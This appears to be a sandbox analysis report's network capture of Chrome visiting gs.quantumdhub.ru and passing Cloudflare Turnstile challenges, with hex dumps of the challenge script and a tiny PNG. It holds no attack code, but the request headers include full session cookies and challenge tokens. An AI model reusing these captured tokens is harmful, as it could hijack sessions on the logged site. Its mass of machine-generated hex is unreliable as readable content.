                                                                            2024-12-19 14:36:22 UTC240INHTTP/1.1 200 OK
                                                                            Date: Thu, 19 Dec 2024 14:36:22 GMT
                                                                            Content-Type: image/png
                                                                            Content-Length: 61
                                                                            Connection: close
                                                                            cache-control: max-age=2629800, public
                                                                            Server: cloudflare
                                                                            CF-RAY: 8f481fdfdaa08c3c-EWR
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            2024-12-19 14:36:22 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                            Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            11192.168.2.1749708104.21.112.14436604C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-19 14:36:22 UTC1347OUTGET /favicon.ico HTTP/1.1
                                                                            Host: gs.quantumdhub.ru
                                                                            Connection: keep-alive
                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                            sec-ch-ua-mobile: ?0
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                            sec-ch-ua-platform: "Windows"
                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                            Sec-Fetch-Site: same-origin
                                                                            Sec-Fetch-Mode: no-cors
                                                                            Sec-Fetch-Dest: image
                                                                            Referer: https://gs.quantumdhub.ru/HX8hiLPadaz1N7WrltpPjHg34q_2C98ig/
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Cookie: XSRF-TOKEN=eyJpdiI6IjE5eGdvL0E3UjNaY2RvbzNNSHFIb0E9PSIsInZhbHVlIjoiUE0rdlFSOXUrOVRscWRYQ3ZmdDlmYkJZUzM0UU9ERUMybzZEOVVKbVZaUllkV0JQOXN2TVpjemN4bHVUbTVBMitmdkdLSmErUHU5bVEzczFGWkxiV25aSG9WUDVpSU96YTNIbEI3SlVvSUtmL2tMOC9BUnJsMjRTNW9MakduMEkiLCJtYWMiOiJmY2EzMzdjNmEyZjEzOWVkZmE0OGE0ZTgyYzFlYmNjNGE3MTEwNmQ2NzE4OWQ3YmUwYmRkZjAwNmUyMTNlZTdkIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkpMd3ViYi9iUDY0TW5FVDFQd3U4Z3c9PSIsInZhbHVlIjoiVGdnUnFaeEU3R3FyN3c5SG9mam1xN2RZNERNaE1BQjdqQjhFdm92N1lVbzI0bWRWTHV4QmV3eWdMVVY1WWFscEVrWGh0M2F0MEpiYlhUenZyckczanVlQVoxMVBnRVFmVjZ3YzR5cXJyMVhRMGY0bHVsc3NSRDFBTHY5eW5XbTkiLCJtYWMiOiIyY2M1ODM1NmRkZTliNGNkZDJhMzllNDNhMDNkMjMxNDViOTEwOTRkZDVkYzM1NzJjOWVjYWM4NTJhZmNjN2NhIiwidGFnIjoiIn0%3D
                                                                            2024-12-19 14:36:23 UTC1070INHTTP/1.1 404 Not Found
                                                                            Date: Thu, 19 Dec 2024 14:36:23 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Cache-Control: max-age=14400
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6rM%2BDxF2KXBxp70hbns%2BP4nKj0uXQiqt5MX1Dqo4McVJjxDTewf9%2BLi9aBksM2KAz8wPydkmdKzPGl0%2BDyCjbhx5KjCKy6bhKxPqXeylL1LCwSxm4l2CszF07jf6BA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Vary: Accept-Encoding
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1160&min_rtt=1141&rtt_var=358&sent=4&recv=8&lost=0&retrans=0&sent_bytes=2824&recv_bytes=2148&delivery_rate=2282111&cwnd=251&unsent_bytes=0&cid=38652e94931a4a52&ts=139&x=0"
                                                                            CF-Cache-Status: HIT
                                                                            Age: 6187
                                                                            Server: cloudflare
                                                                            CF-RAY: 8f481fe49e2c729f-EWR
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1936&min_rtt=1926&rtt_var=742&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2834&recv_bytes=1925&delivery_rate=1454183&cwnd=169&unsent_bytes=0&cid=1c86ca8961932d23&ts=9244&x=0"
                                                                            2024-12-19 14:36:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            12192.168.2.1749733104.18.94.414436604C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-19 14:36:23 UTC385OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1
                                                                            Host: challenges.cloudflare.com
                                                                            Connection: keep-alive
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                            Accept: */*
                                                                            Sec-Fetch-Site: none
                                                                            Sec-Fetch-Mode: cors
                                                                            Sec-Fetch-Dest: empty
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            2024-12-19 14:36:24 UTC240INHTTP/1.1 200 OK
                                                                            Date: Thu, 19 Dec 2024 14:36:24 GMT
                                                                            Content-Type: image/png
                                                                            Content-Length: 61
                                                                            Connection: close
                                                                            cache-control: max-age=2629800, public
                                                                            Server: cloudflare
                                                                            CF-RAY: 8f481fea3f284295-EWR
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            2024-12-19 14:36:24 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                            Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            13192.168.2.1749734104.18.94.414436604C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-19 14:36:24 UTC433OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8f481fd4183442af&lang=auto HTTP/1.1
                                                                            Host: challenges.cloudflare.com
                                                                            Connection: keep-alive
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                            Accept: */*
                                                                            Sec-Fetch-Site: none
                                                                            Sec-Fetch-Mode: cors
                                                                            Sec-Fetch-Dest: empty
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            2024-12-19 14:36:24 UTC331INHTTP/1.1 200 OK
                                                                            Date: Thu, 19 Dec 2024 14:36:24 GMT
                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                            Content-Length: 115168
                                                                            Connection: close
                                                                            cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                            Server: cloudflare
                                                                            CF-RAY: 8f481feccd880f63-EWR
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            2024-12-19 14:36:24 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 53 79 57 4f 55 33 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 70 72 69 76 61 63 79 70 6f 6c 69 63 79 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65
                                                                            Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.SyWOU3={"metadata":{"challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconce
                                                                            2024-12-19 14:36:24 UTC1369INData Raw: 65 5f 66 6f 6f 74 65 72 5f 74 65 72 6d 73 22 3a 22 54 65 72 6d 73 22 2c 22 69 6e 76 61 6c 69 64 5f 73 69 74 65 6b 65 79 22 3a 22 49 6e 76 61 6c 69 64 25 32 30 73 69 74 65 6b 65 79 2e 25 32 30 43 6f 6e 74 61 63 74 25 32 30 74 68 65 25 32 30 53 69 74 65 25 32 30 41 64 6d 69 6e 69 73 74 72 61 74 6f 72 25 32 30 69 66 25 32 30 74 68 69 73 25 32 30 70 72 6f 62 6c 65 6d 25 32 30 70 65 72 73 69 73 74 73 2e 22 2c 22 69 6e 76 61 6c 69 64 5f 64 6f 6d 61 69 6e 22 3a 22 49 6e 76 61 6c 69 64 25 32 30 64 6f 6d 61 69 6e 2e 25 32 30 43 6f 6e 74 61 63 74 25 32 30 74 68 65 25 32 30 53 69 74 65 25 32 30 41 64 6d 69 6e 69 73 74 72 61 74 6f 72 25 32 30 69 66 25 32 30 74 68 69 73 25 32 30 70 72 6f 62 6c 65 6d 25 32 30 70 65 72 73 69 73 74 73 2e 22 2c 22 74 75 72 6e 73 74 69 6c
                                                                            Data Ascii: e_footer_terms":"Terms","invalid_sitekey":"Invalid%20sitekey.%20Contact%20the%20Site%20Administrator%20if%20this%20problem%20persists.","invalid_domain":"Invalid%20domain.%20Contact%20the%20Site%20Administrator%20if%20this%20problem%20persists.","turnstil
                                                                            2024-12-19 14:36:24 UTC1369INData Raw: 2c 67 62 2c 67 6c 2c 67 77 2c 67 41 2c 67 42 2c 67 43 2c 67 47 2c 67 48 2c 65 4f 2c 65 50 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 70 61 72 73 65 49 6e 74 28 67 49 28 31 34 34 33 29 29 2f 31 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 35 34 36 29 29 2f 32 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 38 33 31 29 29 2f 33 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 35 33 35 29 29 2f 34 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 31 34 32 29 29 2f 35 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 32 32 39 29 29 2f 36 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 39 39 39 29 29 2f 37 29 2b 2d 70 61 72 73 65 49
                                                                            Data Ascii: ,gb,gl,gw,gA,gB,gC,gG,gH,eO,eP){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=parseInt(gI(1443))/1*(-parseInt(gI(546))/2)+-parseInt(gI(831))/3+-parseInt(gI(1535))/4*(-parseInt(gI(1142))/5)+-parseInt(gI(1229))/6*(-parseInt(gI(999))/7)+-parseI
                                                                            2024-12-19 14:36:24 UTC1369INData Raw: 2c 27 72 62 4b 6d 4e 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 56 49 4a 54 48 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 73 67 76 48 43 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 3c 69 7d 2c 27 69 44 4a 6a 53 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 79 48 55 48 75 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 43 75 76 4d 6c 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 6c 56 71 7a 67 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 47 73 66 5a 5a 27 3a 66 75 6e 63 74 69
                                                                            Data Ascii: ,'rbKmN':function(h,i){return h-i},'VIJTH':function(h,i){return h<i},'sgvHC':function(h,i){return h<<i},'iDJjS':function(h,i){return h-i},'yHUHu':function(h,i){return h-i},'CuvMl':function(h,i){return h<i},'lVqzg':function(h,i){return h(i)},'GsfZZ':functi
                                                                            2024-12-19 14:36:24 UTC1369INData Raw: 28 35 33 37 29 5d 28 43 2c 49 29 3b 4b 3c 3c 3d 31 2c 64 5b 69 30 28 31 38 35 32 29 5d 28 4c 2c 6f 2d 31 29 3f 28 4c 3d 30 2c 4a 5b 69 30 28 31 37 32 38 29 5d 28 73 28 4b 29 29 2c 4b 3d 30 29 3a 4c 2b 2b 2c 43 2b 2b 29 3b 66 6f 72 28 50 3d 46 5b 69 30 28 31 33 32 30 29 5d 28 30 29 2c 43 3d 30 3b 64 5b 69 30 28 37 37 39 29 5d 28 38 2c 43 29 3b 4b 3d 64 5b 69 30 28 31 36 32 38 29 5d 28 4b 2c 31 29 7c 64 5b 69 30 28 35 34 33 29 5d 28 50 2c 31 29 2c 64 5b 69 30 28 36 36 37 29 5d 28 4c 2c 6f 2d 31 29 3f 28 4c 3d 30 2c 4a 5b 69 30 28 31 37 32 38 29 5d 28 73 28 4b 29 29 2c 4b 3d 30 29 3a 4c 2b 2b 2c 50 3e 3e 3d 31 2c 43 2b 2b 29 3b 7d 65 6c 73 65 7b 66 6f 72 28 50 3d 31 2c 43 3d 30 3b 43 3c 49 3b 4b 3d 64 5b 69 30 28 31 36 33 35 29 5d 28 64 5b 69 30 28 31 36 32
                                                                            Data Ascii: (537)](C,I);K<<=1,d[i0(1852)](L,o-1)?(L=0,J[i0(1728)](s(K)),K=0):L++,C++);for(P=F[i0(1320)](0),C=0;d[i0(779)](8,C);K=d[i0(1628)](K,1)|d[i0(543)](P,1),d[i0(667)](L,o-1)?(L=0,J[i0(1728)](s(K)),K=0):L++,P>>=1,C++);}else{for(P=1,C=0;C<I;K=d[i0(1635)](d[i0(162
                                                                            2024-12-19 14:36:24 UTC1369INData Raw: 2b 2b 2c 50 3e 3e 3d 31 2c 43 2b 2b 29 3b 7d 47 2d 2d 2c 30 3d 3d 47 26 26 28 47 3d 4d 61 74 68 5b 69 30 28 37 38 31 29 5d 28 32 2c 49 29 2c 49 2b 2b 29 2c 64 65 6c 65 74 65 20 45 5b 46 5d 7d 65 6c 73 65 20 66 6f 72 28 50 3d 44 5b 46 5d 2c 43 3d 30 3b 64 5b 69 30 28 31 34 37 32 29 5d 28 43 2c 49 29 3b 4b 3d 31 26 50 7c 4b 3c 3c 31 2e 36 2c 4c 3d 3d 64 5b 69 30 28 31 36 34 33 29 5d 28 6f 2c 31 29 3f 28 4c 3d 30 2c 4a 5b 69 30 28 31 37 32 38 29 5d 28 64 5b 69 30 28 31 33 37 36 29 5d 28 73 2c 4b 29 29 2c 4b 3d 30 29 3a 4c 2b 2b 2c 50 3e 3e 3d 31 2c 43 2b 2b 29 3b 47 2d 2d 2c 64 5b 69 30 28 39 34 33 29 5d 28 30 2c 47 29 26 26 49 2b 2b 7d 66 6f 72 28 50 3d 32 2c 43 3d 30 3b 43 3c 49 3b 4b 3d 64 5b 69 30 28 31 32 30 37 29 5d 28 4b 2c 31 29 7c 31 2e 32 31 26 50
                                                                            Data Ascii: ++,P>>=1,C++);}G--,0==G&&(G=Math[i0(781)](2,I),I++),delete E[F]}else for(P=D[F],C=0;d[i0(1472)](C,I);K=1&P|K<<1.6,L==d[i0(1643)](o,1)?(L=0,J[i0(1728)](d[i0(1376)](s,K)),K=0):L++,P>>=1,C++);G--,d[i0(943)](0,G)&&I++}for(P=2,C=0;C<I;K=d[i0(1207)](K,1)|1.21&P
                                                                            2024-12-19 14:36:24 UTC1369INData Raw: 5d 28 48 2c 64 5b 69 33 28 31 36 30 32 29 5d 29 3a 28 4d 3d 48 26 49 2c 49 3e 3e 3d 31 2c 49 3d 3d 30 26 26 28 49 3d 6a 2c 48 3d 6f 28 4a 2b 2b 29 29 2c 4b 7c 3d 28 64 5b 69 33 28 31 35 31 38 29 5d 28 30 2c 4d 29 3f 31 3a 30 29 2a 47 2c 47 3c 3c 3d 31 29 29 3b 73 77 69 74 63 68 28 4b 29 7b 63 61 73 65 20 30 3a 66 6f 72 28 4b 3d 30 2c 4c 3d 4d 61 74 68 5b 69 33 28 37 38 31 29 5d 28 32 2c 38 29 2c 47 3d 31 3b 4c 21 3d 47 3b 4d 3d 49 26 48 2c 49 3e 3e 3d 31 2c 64 5b 69 33 28 37 35 30 29 5d 28 30 2c 49 29 26 26 28 49 3d 6a 2c 48 3d 6f 28 4a 2b 2b 29 29 2c 4b 7c 3d 47 2a 28 30 3c 4d 3f 31 3a 30 29 2c 47 3c 3c 3d 31 29 3b 4e 3d 65 28 4b 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 31 3a 66 6f 72 28 4b 3d 30 2c 4c 3d 4d 61 74 68 5b 69 33 28 37 38 31 29 5d 28 32 2c 31
                                                                            Data Ascii: ](H,d[i3(1602)]):(M=H&I,I>>=1,I==0&&(I=j,H=o(J++)),K|=(d[i3(1518)](0,M)?1:0)*G,G<<=1));switch(K){case 0:for(K=0,L=Math[i3(781)](2,8),G=1;L!=G;M=I&H,I>>=1,d[i3(750)](0,I)&&(I=j,H=o(J++)),K|=G*(0<M?1:0),G<<=1);N=e(K);break;case 1:for(K=0,L=Math[i3(781)](2,1
                                                                            2024-12-19 14:36:24 UTC1369INData Raw: 29 2c 73 5b 69 33 28 37 37 38 29 5d 29 7d 7d 2c 67 3d 7b 7d 2c 67 5b 68 59 28 31 32 34 33 29 5d 3d 66 2e 68 2c 67 7d 28 29 2c 66 73 3d 66 75 6e 63 74 69 6f 6e 28 66 2c 69 36 2c 67 2c 68 2c 69 2c 6a 2c 6b 2c 6c 2c 6d 29 7b 66 6f 72 28 69 36 3d 67 4a 2c 67 3d 7b 7d 2c 67 5b 69 36 28 34 39 38 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 73 29 7b 72 65 74 75 72 6e 20 6e 2b 73 7d 2c 67 5b 69 36 28 31 31 30 36 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 73 29 7b 72 65 74 75 72 6e 20 6e 2d 73 7d 2c 67 5b 69 36 28 31 36 31 39 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 73 29 7b 72 65 74 75 72 6e 20 73 26 6e 7d 2c 68 3d 67 2c 6d 2c 6a 3d 33 32 2c 6c 3d 65 4d 5b 69 36 28 39 32 32 29 5d 5b 69 36 28 31 32 33 34 29 5d 2b 27 5f 27 2b 30 2c 6c 3d 6c 5b 69 36 28 35 36 37 29 5d
                                                                            Data Ascii: ),s[i3(778)])}},g={},g[hY(1243)]=f.h,g}(),fs=function(f,i6,g,h,i,j,k,l,m){for(i6=gJ,g={},g[i6(498)]=function(n,s){return n+s},g[i6(1106)]=function(n,s){return n-s},g[i6(1619)]=function(n,s){return s&n},h=g,m,j=32,l=eM[i6(922)][i6(1234)]+'_'+0,l=l[i6(567)]
                                                                            2024-12-19 14:36:24 UTC1369INData Raw: 5d 5b 69 6f 28 35 35 36 29 5d 28 7b 27 73 6f 75 72 63 65 27 3a 69 6f 28 39 35 34 29 2c 27 77 69 64 67 65 74 49 64 27 3a 65 4d 5b 69 6f 28 39 32 32 29 5d 5b 69 6f 28 31 38 30 34 29 5d 2c 27 65 76 65 6e 74 27 3a 65 5b 69 6f 28 31 30 32 39 29 5d 2c 27 63 66 43 68 6c 4f 75 74 27 3a 65 4d 5b 69 6f 28 39 32 32 29 5d 5b 69 6f 28 38 31 31 29 5d 2c 27 63 66 43 68 6c 4f 75 74 53 27 3a 65 4d 5b 69 6f 28 39 32 32 29 5d 5b 69 6f 28 31 33 38 31 29 5d 2c 27 63 6f 64 65 27 3a 69 6f 28 35 33 30 29 2c 27 72 63 56 27 3a 65 4d 5b 69 6f 28 39 32 32 29 5d 5b 69 6f 28 31 32 37 37 29 5d 7d 2c 27 2a 27 29 29 7d 2c 67 29 7d 2c 65 4d 5b 67 4a 28 31 34 32 34 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 66 2c 67 2c 68 2c 69 70 2c 69 2c 6a 2c 6b 2c 6c 2c 6d 2c 6e 2c 6f 2c 73 2c 78 2c 42 2c 43
                                                                            Data Ascii: ][io(556)]({'source':io(954),'widgetId':eM[io(922)][io(1804)],'event':e[io(1029)],'cfChlOut':eM[io(922)][io(811)],'cfChlOutS':eM[io(922)][io(1381)],'code':io(530),'rcV':eM[io(922)][io(1277)]},'*'))},g)},eM[gJ(1424)]=function(f,g,h,ip,i,j,k,l,m,n,o,s,x,B,C
                                                                            2024-12-19 14:36:24 UTC1369INData Raw: 29 5d 5b 69 70 28 31 32 33 34 29 5d 29 2c 27 3d 27 29 2b 44 29 7d 63 61 74 63 68 28 45 29 7b 7d 7d 2c 65 4d 5b 67 4a 28 31 32 31 31 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 69 71 2c 66 2c 67 2c 68 2c 69 2c 6a 2c 6b 2c 6c 2c 6d 2c 6e 2c 6f 29 7b 28 69 71 3d 67 4a 2c 66 3d 7b 7d 2c 66 5b 69 71 28 31 37 36 37 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 73 2c 76 29 7b 72 65 74 75 72 6e 20 76 3d 3d 3d 73 7d 2c 67 3d 66 2c 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 45 72 72 6f 72 29 3f 28 68 3d 65 5b 69 71 28 31 33 35 32 29 5d 2c 65 5b 69 71 28 35 37 33 29 5d 26 26 74 79 70 65 6f 66 20 65 5b 69 71 28 35 37 33 29 5d 3d 3d 3d 69 71 28 31 37 35 32 29 29 26 26 28 6c 3d 65 5b 69 71 28 35 37 33 29 5d 5b 69 71 28 31 38 36 39 29 5d 28 27 5c 6e 27 29 2c 6c 5b 69 71 28 31 31 38 39
                                                                            Data Ascii: )][ip(1234)]),'=')+D)}catch(E){}},eM[gJ(1211)]=function(e,iq,f,g,h,i,j,k,l,m,n,o){(iq=gJ,f={},f[iq(1767)]=function(s,v){return v===s},g=f,e instanceof Error)?(h=e[iq(1352)],e[iq(573)]&&typeof e[iq(573)]===iq(1752))&&(l=e[iq(573)][iq(1869)]('\n'),l[iq(1189


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            14192.168.2.1749735104.18.95.414436604C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-19 14:36:24 UTC1171OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1775978109:1734617617:EyZoP9ZsFKkpBu9bVNo10nyFoZAd8OdM8YsSiTAyQxg/8f481fd4183442af/4ofFE0XhC0z5WAQeEBpj4WuFQFzBT9H9oSE9sMGdHfo-1734618980-1.1.1.1-ecTzc1GpiSyvKMBQSDJq8u5FYhAr.z.aa9OrhQGw8qgNf1.4w8WuwOpHiuyPMPm3 HTTP/1.1
                                                                            Host: challenges.cloudflare.com
                                                                            Connection: keep-alive
                                                                            Content-Length: 3285
                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                            Content-type: application/x-www-form-urlencoded
                                                                            CF-Chl-RetryAttempt: 0
                                                                            sec-ch-ua-mobile: ?0
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                            CF-Challenge: 4ofFE0XhC0z5WAQeEBpj4WuFQFzBT9H9oSE9sMGdHfo-1734618980-1.1.1.1-ecTzc1GpiSyvKMBQSDJq8u5FYhAr.z.aa9OrhQGw8qgNf1.4w8WuwOpHiuyPMPm3
                                                                            sec-ch-ua-platform: "Windows"
                                                                            Accept: */*
                                                                            Origin: https://challenges.cloudflare.com
                                                                            Sec-Fetch-Site: same-origin
                                                                            Sec-Fetch-Mode: cors
                                                                            Sec-Fetch-Dest: empty
                                                                            Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/g1eg9/0x4AAAAAAA01zeNo8XyUDmXH/auto/fbE/normal/auto/
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            2024-12-19 14:36:24 UTC3285OUTData Raw: 76 5f 38 66 34 38 31 66 64 34 31 38 33 34 34 32 61 66 3d 55 39 78 74 35 74 54 74 34 74 68 74 76 74 62 42 6e 57 42 6e 73 37 49 73 49 4e 65 59 49 65 6e 49 37 47 4e 4b 49 34 47 6e 4c 42 6e 47 4b 4d 6e 44 71 74 4b 53 25 32 62 73 71 53 35 6a 39 49 69 6e 36 37 54 4b 6e 58 54 74 6e 7a 5a 6e 65 38 61 6e 59 48 37 6e 4e 78 6a 74 4c 71 6e 61 74 54 35 48 6e 76 42 53 54 47 6e 70 74 6e 4b 6e 44 61 63 4c 44 7a 74 24 6a 4d 49 30 38 31 65 6d 5a 66 52 4c 44 4d 49 4e 38 77 37 64 24 54 65 5a 6e 4c 78 49 24 6e 6e 35 54 62 52 2d 6a 71 42 71 6e 7a 37 61 43 55 74 2b 41 49 49 48 6c 4b 37 7a 43 73 71 4d 53 36 4c 4d 6e 78 37 38 55 5a 6e 49 63 75 68 74 6e 33 6e 49 31 55 47 35 2d 6e 2b 71 56 6e 75 7a 48 6e 49 71 6e 58 6e 55 79 74 57 37 4e 6c 2d 35 43 66 4d 49 42 4b 37 6e 6f 65 65 56
                                                                            Data Ascii: v_8f481fd4183442af=U9xt5tTt4thtvtbBnWBns7IsINeYIenI7GNKI4GnLBnGKMnDqtKS%2bsqS5j9Iin67TKnXTtnzZne8anYH7nNxjtLqnatT5HnvBSTGnptnKnDacLDzt$jMI081emZfRLDMIN8w7d$TeZnLxI$nn5TbR-jqBqnz7aCUt+AIIHlK7zCsqMS6LMnx78UZnIcuhtn3nI1UG5-n+qVnuzHnIqnXnUytW7Nl-5CfMIBK7noeeV
                                                                            2024-12-19 14:36:24 UTC747INHTTP/1.1 200 OK
                                                                            Date: Thu, 19 Dec 2024 14:36:24 GMT
                                                                            Content-Type: text/plain; charset=UTF-8
                                                                            Content-Length: 149720
                                                                            Connection: close
                                                                            cf-chl-gen: y1z96AmTOYhAV4pWazAuUUwfAFKvA4Vl3AiL63Xhqwhs+j4sWGJG7brVGFrkyNAqj1kagFdxSOiaWwMvcLAPE0xZddSQvtN3UdXGD9Mf8j8ceXqbojpF9X4NWlWXhAfWHLInYgN7lXcEH9vRqor8qusUfiQW/kvvYD5ZGORaz/qXSlO7Ld5h6zMK9Kdyt60SVEAE8Gao6ZNof18nokvAffDUHfebRhkIapzKx4wXI409ZiMU4MCA5ryacf293XVLpKqdEZ4Cg9z1olvF8HEGqltINkVyJLvxFgAnFONO82GSQta2PEPKlvFE2h0CPzM7i098D79NNXiFk2aehDtpTr7r60APEmXypt6tgh729fQL5iS7utLyOZqGqHWMbSGTlAzpHhJWRLu2W+WX95Uwh99yW7zXJ9Gko4G8C6KmZ0LEnu7a6Qy6zcxf5KUqTPhs3xQS36HVIOYP33f5pbvkW2kYP2S/6vxpHdeQ9XTWvwjUeq8=$ee24sESaH6Qhk0nm
                                                                            Server: cloudflare
                                                                            CF-RAY: 8f481fed0e98443e-EWR
                                                                            alt-svc: h3=":443"; ma=86400
